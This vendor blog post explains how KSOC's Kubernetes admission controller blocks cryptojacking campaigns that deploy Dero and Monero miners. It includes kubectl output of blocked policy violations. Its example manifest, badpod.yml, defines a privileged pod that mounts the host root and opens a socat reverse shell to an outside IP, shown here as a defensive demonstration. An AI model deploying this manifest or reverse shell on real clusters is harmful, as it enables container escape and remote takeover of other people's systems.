Sign in Subscribe

How KSOC Protects Against the Dero Cryptocurrency Miner

KSOC

7 min read

Overview

A first-of-its-kind set of cryptojacking operations has been discovered targeting Kubernetes clusters in the wild. The general goal of each operation is to use the victim's Kubernetes resources to mine cryptocurrency. The first miner targets Dero by deploying a DaemonSet pod on each node in the cluster to mine the cryptocurrency. The second miner targets Monero, creating a privileged pod and mounting a host directory, allowing it to escape the container. The attacker’s goal is to install the miner directly on the nodes instead of in a pod so that it can enjoy higher priority access to node resources.

It’s important to note that, while these attacks bring crypto miners into the cluster, the attack path has to establish outbound connections with a malicious server to get files. In doing so, an attack path is created that could just as easily be used to exfiltrate data from a cluster.

See KSOC Defend

Why Kubernetes is a Great Target for Cryptocurrency Miners

Kubernetes is a widely adopted container orchestrator. While it offers a near unlimited amount of configuration, it was never meant to be configured out of the box for security. Kubernetes also offers plenty of compute and auto-scaling capabilities for attackers to cause serious financial damage. These malicious miners typically come bundled with other command and control programs and data exfiltration malware.

While cryptocurrency miners target Kubernetes due to its lack of built-in security detections, most guardrails today start with point in time Kubernetes posture scanners that leave security teams blind to rogue workloads, container escapes, and privilege escalation within the cluster.

If you would like to learn more about the most pressing risks that face CISOs today when it comes to Kubernetes, our Co-founder & CTO wrote the OWASP Top Ten for Kubernetes as an in-depth reference and guide.

How KSOC Can Mitigate the Risk

What few recognize about Kubernetes Security and Posture Management (KSPM) tools today is that they surface misconfigurations on polling intervals, which run, on average, every 24 hours. But Kubernetes workloads are dynamic, containers live for less than 5 minutes and thousands of deployments with various configurations happen on any given day. Periodically scanning for Kubernetes misconfigurations is an incredibly inefficient and inactionable tool in either preventing or reducing the blast radius of  cryptocurrency miners.

KSOC is the first and only KSPM platform that surfaces misconfigurations in real-time, taking the lifecycle of the Kubernetes workload into account to determine what is currently relevant. The obvious benefit here is to save you time diagnosing issues as well as help you make the most effective remediation decisions possible based on the current state of your clusters. View this demo to see real-time Kubernetes security in action.

View On-Demand Demo

Kube API Anonymous Auth

“The researchers say the attacks start with the threat actors scanning exposed, vulnerable Kubernetes clusters with authentication set to --anonymous-auth=true, allowing anyone anonymous access to the Kubernetes API.”

KSOC can detect kube-api servers with anonymous authentication enabled and warn administrators.

This is just one way into a Kubernetes cluster. While KSOC can detect clusters that allow anonymous authentication and warn administrators, Kubernetes defaults to --anonymous-auth=false and managed Kubernetes (e.g. EKS, AKS, GKE) will also not allow anonymous authentication.

Vulnerable web applications are not uncommon and web applications attacks by bots and live attackers can be assumed to be occurring at any given moment. If a web application has a command injection vulnerability, the pod running the web application could be compromised.

Whether the cluster is infiltrated via a misconfigured kube-api server or via a compromised pod or some other method, what should be top of mind is limiting the blast radius.

Pods with Security Misconfigurations

Stopping workloads containing images not from trusted image sources, including malicious DaemonSets, is part of KSOC’s default set of functions.

“After gaining access to the API, the threat actors will deploy a DaemonSet named "proxy-api" that allows the attackers to engage the resources of all nodes in the cluster simultaneously and mine Dero using the available resources.”

In addition to stopping workloads not from trusted sources, KSOC is always on the watch for pods with serious security misconfigurations. The pods might be intended for malicious use or accidentally misconfigured and could be dangerous if compromised. Stopping such workloads from being deployed and limiting the blast radius of a compromised cluster is a key focus of KSOC.

“The second threat actor deleted the proxy-api DaemonSet used by the Dero campaign and then performed a much more aggressive takeover of the cluster, employing a privileged pod and mounting a host directory, attempting to escape the container.”

The following list of misconfigurations could be blocked by KSOC and thwart both of the attacks described.

  • images from non-whitelisted registries
  • privileged pods
  • host mounted paths

Here we can see an attempt to deploy a pod that violates these and other policies. Notice the timestamp at the top.

➜  guardblockresults date
Wed Mar 15 12:48:25 PDT 2023
➜  guardblockresults kubectl apply -f badpod.yml
Warning: Policy policy-20a436eb-e2af-4c22-85e9-83c01f9d0050 was violated (Pod everything-allowed-revshell-pod container everything-allowed-pod is set to run as privileged.) and has flag block=true, please fix the policy violation - Blocked
Warning: Policy policy-b81959bb-948b-49b2-8d2d-413c29b6fc47 was violated (Pod container everything-allowed-pod has does not have 'all' or 'ALL' drop capabilities. It has drop capabilities NOT FOUND. Containers run with a default set of capabilities as assigned by the Container Runtime. Capabilities are parts of the rights generally granted on a Linux system to the root user. In many cases applications running in containers do not require any capabilities to operate, so from the perspective of the principle of least privilege use of capabilities should be minimized.) and has flag block=true, please fix the policy violation - Blocked
Warning: Policy policy-c0f45abe-b97c-4487-bade-596db74f41ac was violated (Pod everything-allowed-revshell-pod container everything-allowed-pod is running as root.) and has flag block=true, please fix the policy violation - Blocked
Warning: Policy policy-8a044193-d2a9-4a01-bb9e-6fa64a92b561 was violated (Pod everything-allowed-revshell-pod Service Account Token can be mounted in all containers. The key automountServiceAccountToken should be set to false. The pod spec takes precedence over the service account if both specify a automountServiceAccountToken value. Service accounts tokens should not be mounted in pods except where the workload running in the pod explicitly needs to communicate with the API server.) and has flag block=true, please fix the policy violation - Blocked
Warning: Policy allowedregistry-01272523-5066-48f6-bda7-15368f49c9a4 was violated (Pod everything-allowed-revshell-pod container everything-allowed-pod with image jzarris/socat@sha256:1b9c87b01477449e5a8eb75c0afefa9cbc34b6b65461505c98933a231168a4a2 is not sources from an allowed registry from list {"jzarris/dvwa", "private2.example.com/", "us.gcr.io/"}.) and has flag block=true, please fix the policy violation - Blocked
Warning: Policy policy-7ae3dbfc-c357-4358-8506-89ced59a1e0a was violated (Pod everything-allowed-revshell-pod container everything-allowed-pod has volume noderoot with hostPath / set. Do not generally admit containers which make use of hostPath volumes.) and has flag block=true, please fix the policy violation - Blocked
Warning: Policy policy-6b494510-b0be-46de-bb74-bb380dcac1df was violated (Pod everything-allowed-revshell-pod missing or empty securityContext.) and has flag block=true, please fix the policy violation - Blocked
Warning: Policy policy-a887ae13-ebe1-4fee-bf1d-666ca82fde2e was violated (Pod everything-allowed-pod container seccompProfile does not exist.) and has flag block=true, please fix the policy violation - Blocked
Warning: Policy policy-1cf7eb41-d760-49e8-8872-13ad50c30de9 was violated (Pod everything-allowed-revshell-pod container everything-allowed-pod is not using a read-only filesystem.) and has flag block=true, please fix the policy violation - Blocked
Warning: Policy policy-8d2d4016-bf46-4bf1-9dff-255a2078d144 was violated (Pod everything-allowed-revshell-pod container everything-allowed-pod does not have a cpu limit set.) and has flag block=true, please fix the policy violation - Blocked
Warning: Policy policy-a7275b48-8bc3-4731-b9df-2612eae91bce was violated (Pod everything-allowed-revshell-pod shares the host PID namespace.) and has flag block=true, please fix the policy violation - Blocked
Warning: Policy policy-2c8d88ae-27dc-4111-9243-2a134d578358 was violated (Pod everything-allowed-revshell-pod container everything-allowed-pod does not have a memory limit set.) and has flag block=true, please fix the policy violation - Blocked
Warning: Policy policy-6b98fe9f-38a3-41d8-aae8-2b21b33cd169 was violated (Pod everything-allowed-revshell-pod shares the host IPC namespace.) and has flag block=true, please fix the policy violation - Blocked
Warning: Policy policy-03cb2747-4757-4133-ba04-40dff1f697c8 was violated (Pod everything-allowed-revshell-pod shares the host network.) and has flag block=true, please fix the policy violation - Blocked
Error from server (Forbidden): error when creating "badpod.yml": admission webhook "guard.ksoc.com" denied the request: Policy policy-20a436eb-e2af-4c22-85e9-83c01f9d0050 was violated (Pod everything-allowed-revshell-pod container everything-allowed-pod is set to run as privileged.) and has flag block=true, please fix the policy violation - Blocked

The event was blocked and is seen in the UI less than a second after the pod was blocked. The blocked reasons include:

  • Running as privileged
  • Image not from list of approved registries
  • Use of hostPath volume
  • Shares the host network

badpod.yml used in example

apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-revshell-pod
  namespace: dvwa
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: jzarris/socat
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "socat tcp-connect:204.174.12.193:1338 exec:bash,pty,stderr,setsid,sigint" ]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
  volumes:
  - name: noderoot
    hostPath:
      path: /

“Next, the threat actor used a custom XMRig miner downloaded from the attacker's command and control server to mine Monero by escalating to the host and installing a custom service.
The Monero campaign opted to mine on the host instead of the pods, as Dero did, to access more computational resources and make a more significant profit.”

This was only possible because the attacker was able to mount a privileged pod with a mounted host directory which allowed escape from the container. KSOC would block the privileged pod, regardless of how the cluster was compromised, with the default rules as seen in the example above.

Conclusion

This attack is the first of its kind and getting a real-time view into the Kubernetes lifecycle is the only way to ensure your future success against this and other attacks. Reach out for a demo today to put real-time Kubernetes security to the test in discovering and proactively controlling your Kubernetes exposure.

Get in Touch

Sign up for the latest from KSOC.

Enter your email
Subscribe